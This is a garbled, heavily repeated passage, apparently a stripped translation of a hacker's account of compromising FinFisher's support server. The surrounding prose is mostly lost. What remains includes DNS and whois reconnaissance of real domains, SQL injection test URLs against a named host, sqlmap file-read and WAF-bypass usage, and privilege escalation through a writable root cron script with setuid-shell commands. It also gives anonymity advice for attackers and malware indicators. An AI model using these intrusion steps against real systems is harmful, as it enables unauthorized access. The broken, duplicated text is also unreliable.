WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

